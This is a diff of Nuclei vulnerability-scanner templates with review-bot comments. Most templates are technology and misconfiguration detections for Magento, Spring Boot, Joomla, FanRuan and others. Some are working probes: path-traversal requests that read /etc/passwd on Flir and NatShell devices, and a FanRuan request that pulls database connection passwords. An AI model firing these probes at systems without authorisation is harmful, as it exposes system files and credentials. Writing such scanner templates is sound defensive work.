@ -0,0 +1,26 @@
|
|||
id: joomla-file-listing
|
||||
|
||||
info:
|
||||
name: Joomla database files listing
|
||||
author: iampritam
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6377
|
||||
description: Searches for the pattern /libraries/joomla/database/ on passed URLs.
|
||||
tags: exposure,joomla,listing
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/libraries/joomla/database/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Index of /libraries/joomla/database"
|
||||
- "Parent Directory"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
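Review bot: the `Index of /libraries/joomla/database` plus `Parent Directory` pair under `condition: and` is Apache autoindex markup; nginx autoindex prints `../` instead of "Parent Directory", so listings served by nginx are missed. Either drop the second word or accept both listing styles, and the description should say it checks for a directory listing rather than "Searches for the pattern".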
@ -3,31 +3,95 @@ Accept-Charset
|
|||
Accept-Datetime
|
||||
Accept-Encoding
|
||||
Accept-Language
|
||||
Alt-Svc
|
||||
Authorization
|
||||
Base-Url
|
||||
CF-Connecting-IP
|
||||
Cache-Control
|
||||
Client-IP
|
||||
Cluster
|
||||
Cluster-Client-IP
|
||||
Connection
|
||||
Contact
|
||||
Content-Length
|
||||
Content-MD5
|
||||
Content-Type
|
||||
Cookie
|
||||
DNT
|
||||
Date
|
||||
Destination
|
||||
Expect
|
||||
Forwarded
|
||||
From
|
||||
Front-End-Https
|
||||
HTTP_CLIENT_IP
|
||||
HTTP_FORWARDED
|
||||
HTTP_FORWARDED_FOR
|
||||
HTTP_X_FORWARDED
|
||||
HTTP_X_FORWARDED_FOR
|
||||
Host
|
||||
Http-Url
|
||||
If-Match
|
||||
If-Modified-Since
|
||||
If-None-Match
|
||||
If-Range
|
||||
If-Unmodified-Since
|
||||
Link
|
||||
Location
|
||||
Max-Forwards
|
||||
Origin
|
||||
Pragma
|
||||
Profile
|
||||
Proxy
|
||||
Proxy-Authorization
|
||||
Proxy-Connection
|
||||
Proxy-Host
|
||||
Proxy-Url
|
||||
Range
|
||||
Real-Ip
|
||||
Redirect
|
||||
Referer
|
||||
Referrer
|
||||
Refferer
|
||||
Request-Uri
|
||||
TE
|
||||
True-Client-IP
|
||||
UID
|
||||
Upgrade
|
||||
Uri
|
||||
User-Agent
|
||||
Via
|
||||
Warning
|
||||
X-ATT-DeviceId
|
||||
X-Arbitrary
|
||||
X-CSRFToken
|
||||
X-Client-IP
|
||||
X-Cluster-Client-IP
|
||||
X-Correlation-ID
|
||||
X-Csrf-Token
|
||||
X-Do-Not-Track
|
||||
X-Forward-For
|
||||
X-Forwarded
|
||||
X-Forwarded-By
|
||||
X-Forwarded-For
|
||||
X-Forwarded-For-Original
|
||||
X-Forwarded-Host
|
||||
X-Forwarded-Proto
|
||||
X-Forwarded-Server
|
||||
X-Forwarder-For
|
||||
X-Host
|
||||
X-Http-Destinationurl
|
||||
X-Http-Host-Override
|
||||
X-Http-Method-Override
|
||||
X-Original-Remote-Addr
|
||||
X-Original-Url
|
||||
X-Proxy-Url
|
||||
X-ProxyUser-Ip
|
||||
X-Real-Ip
|
||||
X-Remote-Addr
|
||||
X-Request-ID
|
||||
X-Requested-With
|
||||
X-Rewrite-Url
|
||||
X-UIDH
|
||||
X-Wap-Profile
|
||||
X-XSRF-TOKEN
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: google-floc-disabled
|
||||
|
||||
info:
|
||||
name: Google FLoC Disabled
|
||||
author: geeknik
|
||||
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
|
||||
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
|
||||
severity: info
|
||||
tags: google,floc,misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "interest-cohort=()"
|
|
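Review bot: typo "explicity" → "explicitly" in the description. The header match on `interest-cohort=()` is fine; naming the header that carries it (Permissions-Policy) in the description makes the finding self-explanatory.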
@ -0,0 +1,25 @@
|
|||
id: tabnabbing-check
|
||||
|
||||
info:
|
||||
name: Reverse Tabnabbing
|
||||
author: bolli95
|
||||
severity: info
|
||||
tags: misc
|
||||
reference: |
|
||||
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
|
||||
- https://www.youtube.com/watch?v=TMKZCHYmtD4
|
||||
- https://hackerone.com/reports/211065
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
|
|
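Review bot: the rel alternation in the DSL regex accepts only four exact values (`noopener noreferrer`, `noreferrer noopener`, `noreferrer`, `noopener`), so anchors such as `rel="nofollow noopener"` or single-quoted `rel='noopener'` are reported as vulnerable; matching `rel=\"[^\"]*no(opener|referrer)` and its single-quote form avoids those false positives. `[A-z ...]` also spans the ASCII characters between `Z` and `a`, which already include `_`, `\\`, `[` and `]`; `[A-Za-z ...]` is what is meant. The second matcher excludes sites that send `Referrer-Policy: no-referrer`, but that header only suppresses the Referer; it does not sever `window.opener`, so the exclusion hides real cases.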
@ -2,13 +2,13 @@ id: java-melody-exposed
|
|||
|
||||
info:
|
||||
name: JavaMelody Monitoring Exposed
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK & thomas_from_offensity
|
||||
severity: medium
|
||||
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
|
||||
reference: |
|
||||
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
|
||||
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
|
||||
tags: config,jira,confluence,bamboo,atlassian
|
||||
tags: config,java,javamelody
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: springboot-beans
|
||||
|
||||
info:
|
||||
name: Detect Springboot Beans Actuator
|
||||
author: ajaysenr
|
||||
severity: low
|
||||
description: Displays a complete list of all the Spring beans in the application
|
||||
tags: springboot,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/beans"
|
||||
- "{{BaseURL}}/actuator/beans"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"type"'
|
||||
- '"beans"'
|
||||
- '"dependencies"'
|
||||
- '"scope"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
- "application/vnd.spring-boot.actuator"
|
||||
- "application/vnd.spring-boot.actuator.v1+json"
|
||||
condition: or
|
||||
part: header
|
|
@ -10,6 +10,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/httptrace"
|
||||
- "{{BaseURL}}/actuator/httptrace"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: fanruanoa-detect
|
||||
|
||||
info:
|
||||
name: FanRuanOA-detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: oa,tech,dotnet,fanruan
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/WebReport/ReportServer"
|
||||
- "{{BaseURL}}/ReportServer"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'DeploySuccess._init'
|
|
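Review bot: `tags: oa,tech,dotnet,fanruan` contradicts the sibling fanruanoa2012-detect template in this commit, which tags the same vendor `java`; `/WebReport/ReportServer` is FineReport's Java servlet endpoint, so `dotnet` looks wrong here. `name: FanRuanOA-detect` could also be a readable title ("FanRuan OA Detect") like the other detect templates.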
@ -0,0 +1,21 @@
|
|||
id: fanruanoa2012-detect
|
||||
|
||||
info:
|
||||
name: FanRuanOA2012-detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: oa,java,fanruan,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'down.download?FM_SYS_ID'
|
|
@ -0,0 +1,27 @@
|
|||
id: landrayoa-detect
|
||||
|
||||
info:
|
||||
name: LandrayOA detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: tech,landrayoa
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.jsp'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'lui_login_input_username'
|
||||
- 'lui_login_input_password'
|
||||
condition: and
|
||||
- type: word
|
||||
words:
|
||||
- 'isopen='
|
||||
part: header
|
|
@ -0,0 +1,33 @@
|
|||
id: magento-detect
|
||||
|
||||
info:
|
||||
name: Magento Detect
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: Identify Magento
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
||||
|
||||
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
||||
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
|
||||
# https://devdocs.magento.com/guides/v2.4/graphql/
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(tolower(all_headers), "x-magento")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "graphql-authorization")'
|
||||
- 'contains(body, "The current customer")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
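Review bot: `tags: magento` omits the `tech` tag that every other detection template in this change uses (`tech,octobercms`, `tech,pega`, `tech,landrayoa`, ...), so tag-filtered runs will skip it; suggest `tags: tech,magento`. The three comment lines sitting between `path:` and `matchers-condition:` would read better folded into `description:`, which currently says only `Identify Magento`; stating there that the `x-magento` header branch is the primary signal and the GraphQL `customerDownloadableProducts` probe is the fallback for SPA/PWA fronts behind a proxy is exactly the intent the comments describe.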
@ -1,20 +1,23 @@
|
|||
id: magmi-detect
|
||||
|
||||
info:
|
||||
name: "MAGMI (Magento Mass Importer) Plugin Detect"
|
||||
author: "dwisiswant0"
|
||||
severity: "info"
|
||||
name: MAGMI (Magento Mass Importer) Plugin Detect
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
tags: magento,magmi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/magmi/web/js/magmi_utils.js"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "magmi_multifield"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: octobercms-detect
|
||||
|
||||
info:
|
||||
name: OctoberCMS detect
|
||||
author: cyllective
|
||||
severity: info
|
||||
description: Detects OctoberCMS
|
||||
tags: tech,octobercms
|
||||
references: https://github.com/octobercms/october
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'october_session'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'OctoberCMS'
|
|
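Review bot: `references:` is not the key the other templates in this change use (`reference:`, see `magento-cacheleak` and `pega-detect`), so the URL will most likely be ignored when `info` is parsed; rename it. Also note that without `matchers-condition` the two word matchers are OR-ed, so the literal string `OctoberCMS` anywhere in the body of either path (after one redirect) is enough to report detection; if that is intended, say so in `description`, otherwise add `matchers-condition: and`.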
@ -0,0 +1,26 @@
|
|||
id: pega-detect
|
||||
|
||||
info:
|
||||
name: Pega Infinity Detection
|
||||
author: sshell
|
||||
severity: info
|
||||
tags: tech,pega
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"description" :"The Pega API'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
|
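Review bot: the word `'"description" :"The Pega API'` hard-codes one particular whitespace layout of the JSON (`"description" :"`), so a server that serializes as `"description":"` or `"description": "` will not match; a `regex` matcher such as `"description"\s*:\s*"The Pega API` is more robust. The hard-coded Firefox 55 `User-Agent` also deserves a comment saying why it is needed (does the endpoint reject the default client string?), otherwise it looks accidental.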
@ -0,0 +1,24 @@
|
|||
id: voipmonitor-detect
|
||||
|
||||
info:
|
||||
name: VoipMonitor detect
|
||||
author: Yanyun
|
||||
severity: info
|
||||
tags: tech,voipmonitor
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'share.voipmonitor.org'
|
||||
- 'VoIPmonitor'
|
||||
condition: and
|
|
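Review bot: `author: Yanyun` differs from the `YanYun` spelling used in the `fanruanoa2012-detect`, `landrayoa-detect` and `fanruanoa2012-disclosure` templates of this same change; pick one spelling so author filtering and contributor stats group them together.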
@ -0,0 +1,23 @@
|
|||
id: xxljob-admin-detect
|
||||
|
||||
info:
|
||||
name: XXLJOB Admin Login
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: tech,xxljob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xxl-job-admin/toLogin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<a><b>XXL</b>JOB</a>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
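Review bot: the name `XXLJOB Admin Login` and the `/xxl-job-admin/toLogin` path describe a login panel, yet the template is tagged `tech` and filed as a technology detection; the repository keeps panels under `exposed-panels` (the magento workflow later in this change references `exposed-panels/magento-admin-panel.yaml`), so either move it there or add `panel` to the tags so panel-only scans pick it up.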
@ -0,0 +1,42 @@
|
|||
id: magento-2-exposed-api
|
||||
|
||||
info:
|
||||
name: Exposed Magento 2 API
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
|
||||
reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/V1/products'
|
||||
- '{{BaseURL}}/rest/V1/store/storeConfigs'
|
||||
- '{{BaseURL}}/rest/V1/store/storeViews'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "searchCriteria")'
|
||||
- 'contains(body, "parameters")'
|
||||
- 'contains(body, "message")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "secure_base_link_url")'
|
||||
- 'contains(body, "timezone")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "name")'
|
||||
- 'contains(body, "website_id")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
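Review bot: the first `dsl` branch (`searchCriteria`, `parameters`, `message`, JSON content type) has no `status_code == 200` check, unlike the other two, and those three strings read like an API error envelope rather than a product listing, so the template will report `Exposed Magento 2 API` on a `/rest/V1/products` call that merely returned an error. Either add the status check plus a key only a real product payload contains (e.g. `"items"` together with `"total_count"`), or say in `description` that this branch only confirms the REST endpoint is reachable. With the description stating that hidden products and prices are exposed, `severity: info` also reads low; `low` or `medium` would match the text.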
@ -0,0 +1,35 @@
|
|||
id: magento-cacheleak
|
||||
|
||||
info:
|
||||
name: Magento Cacheleak
|
||||
author: TechbrunchFR
|
||||
severity: high
|
||||
description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files.
|
||||
reference:
|
||||
- https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
|
||||
- https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
|
||||
- https://royduineveld.nl/magento-cacheleak-exploit/
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/var/resource_config.json'
|
||||
# Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "media_directory"
|
||||
- "allowed_resources"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
|
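Review bot: the body word matcher lists `media_directory` and `allowed_resources` without a `condition`, so the default `or` applies and either string alone satisfies it; both keys come from the same `resource_config.json`, so `condition: and` costs nothing and cuts false positives. The comment `was not tested against a vulnerable Magento site` belongs in the PR description or the `info` block rather than inside the `path` list, and a `severity: high` template that is explicitly untested should be flagged to maintainers before merging.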
@ -0,0 +1,35 @@
|
|||
id: magento-unprotected-dev-files
|
||||
|
||||
info:
|
||||
name: Magento Unprotected development files
|
||||
author: TechbrunchFR
|
||||
severity: high
|
||||
description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers".
|
||||
reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/dev/tests/functional/credentials.xml.dist'
|
||||
- '{{BaseURL}}/dev/tests/functional/etc/config.xml.dist'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "Magento")'
|
||||
- 'contains(body, "replace xmlns:xsi=")'
|
||||
- 'contains(body, "<field path=")'
|
||||
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "Magento")'
|
||||
- 'contains(body, "config xmlns:xsi")'
|
||||
- 'contains(body, "<application>")'
|
||||
- 'contains(body, "<install>")'
|
||||
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
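Review bot: both probed files are `.dist` distribution templates, yet `description` says they `might reveal your passwords` and the template is `severity: high`; what the matchers actually verify is the XML skeleton (`<replace xmlns:xsi=`, `<config xmlns:xsi`, `<field path=`), i.e. that `dev/tests/functional/` is web-reachable, not that populated credentials are exposed. Either describe the finding that way and lower the severity, or explain in `description` why a reachable `.dist` file implies the populated copy is reachable too. The missing `matchers-condition` defaults to `or`, which is correct here because each path returns a different file, but a short comment saying so saves the next reader a check.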
@ -2,9 +2,9 @@ id: oracle-ebs-bispgrapgh-file-read
|
|||
|
||||
info:
|
||||
name: Oracle EBS Bispgraph File Access
|
||||
author: emenalf & tirtha_mandal
|
||||
author: emenalf & tirtha_mandal & thomas_from_offensity
|
||||
severity: critical
|
||||
tags: moodle,lfi
|
||||
tags: oracle,lfi
|
||||
reference: |
|
||||
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
|
||||
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
|
||||
|
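Review bot: `reference: |` turns the two URLs into a single literal block string whose lines begin with `- `, not into a YAML list, so any tooling that expects `reference` to be a list or a plain URL will receive one string with embedded dashes; drop the `|` and write it as a list exactly as `magento-cacheleak` in this change does. The `moodle,lfi` to `oracle,lfi` tag correction is good.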
@ -20,4 +20,4 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
part: body
|
||||
|
|
|
@ -27,6 +27,8 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- "CONCRETE5"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: fanruanoa2012-disclosure
|
||||
|
||||
info:
|
||||
name: Fanruan Report 2012 Information Disclosure
|
||||
author: YanYun
|
||||
discrption: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
|
||||
severity: high
|
||||
tags: oa,java,fanruan,disclosure
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
||||
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"connection"'
|
||||
- '"name"'
|
||||
- '"driver"'
|
||||
- '"password"'
|
||||
- '"url"'
|
||||
- '"user"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
|
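Review bot: `discrption:` is misspelled, so the description text is silently lost from `info`; rename the key to `description:`. Since `Fanruan Report 2012` is the only version hint, also consider stating the affected product range in the description rather than relying solely on the wiki reference.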
@ -0,0 +1,25 @@
|
|||
id: flir-path-traversal
|
||||
|
||||
info:
|
||||
name: Flir Path Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://juejin.cn/post/6961370156484263972
|
||||
tags: flir,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download.php?file=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
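Review bot: `condition: and` under the regex matcher is redundant, since there is only one regex, and it sits at an indentation level that makes it easy to misread as belonging to `matchers-condition`; drop it, as the `natshell-path-traversal` template in this change does for the same matcher shape. The template also lacks a `description`; one sentence naming which Flir product exposes `download.php` would help triage.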
@ -0,0 +1,24 @@
|
|||
id: natshell-path-traversal
|
||||
|
||||
info:
|
||||
name: NatShell Path Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
|
||||
tags: natshell,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "toor:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
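Review bot: the regex `toor:[x*]:0:0` differs from the `root:[x*]:0:0` used by `flir-path-traversal` and the Oracle EBS template in this change; if NatShell devices really ship a uid-0 `toor` account (as some BSD-derived systems do), add a comment saying so, otherwise this is a typo and the matcher can never fire on a standard `/etc/passwd`. A `description` is missing here as well.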
@ -7,4 +7,4 @@ info:
|
|||
tags: workflow
|
||||
|
||||
workflows:
|
||||
- template: misconfiguration/aem/
|
||||
- template: misconfiguration/aem/
|
|
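Review bot: replacing the explicit `misconfiguration/aem/` template list with a directory path means this workflow now runs whatever lands in that folder, including templates added later that were never reviewed against this workflow; that is a fair trade for maintainability, but it should be stated in the workflow `description` so contributors know that dropping a file into the directory also changes the workflow. The same consideration applies to the gitlab, jira, samsung, springboot, thinkcmf, thinkphp and wordpress workflow hunks in this change.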
@ -10,7 +10,4 @@ workflows:
|
|||
|
||||
- template: exposed-panels/gitlab-detect.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/gitlab/gitlab-public-repos.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-public-signup.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-public-snippets.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-user-enumeration.yaml
|
||||
- template: misconfiguration/gitlab/
|
|
@ -23,11 +23,4 @@ workflows:
|
|||
- template: cves/2019/CVE-2019-3403.yaml
|
||||
- template: cves/2020/CVE-2020-14179.yaml
|
||||
- template: cves/2020/CVE-2020-14181.yaml
|
||||
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
|
||||
- template: vulnerabilities/jira/
|
|
@ -0,0 +1,14 @@
|
|||
id: magento-workflow
|
||||
|
||||
info:
|
||||
name: Magento Security Checks
|
||||
author: TechbrunchFR
|
||||
description: A simple workflow that runs all Magento related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
workflows:
|
||||
- template: technologies/magento-detect.yaml
|
||||
subtemplates:
|
||||
- template: exposures/configs/magento-config.yaml
|
||||
- template: exposed-panels/magento-admin-panel.yaml
|
||||
- template: vulnerabilities/magento/
|
|
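Review bot: the workflow refers to `exposures/configs/magento-config.yaml` and `exposed-panels/magento-admin-panel.yaml`, neither of which is part of this change; confirm both exist at those paths, since a missing subtemplate makes the workflow fail to load. The `magmi-detect` template is tagged `magento` in this same change but is not listed under `subtemplates`, so either add it or note that it is deliberately left out.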
@ -7,6 +7,4 @@ info:
|
|||
|
||||
workflows:
|
||||
- template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
|
||||
- template: vulnerabilities/samsung/
|
|
@ -13,14 +13,7 @@ workflows:
|
|||
|
||||
- template: technologies/springboot-actuator.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/springboot/springboot-configprops.yaml
|
||||
- template: misconfiguration/springboot/springboot-env.yaml
|
||||
- template: misconfiguration/springboot/springboot-heapdump.yaml
|
||||
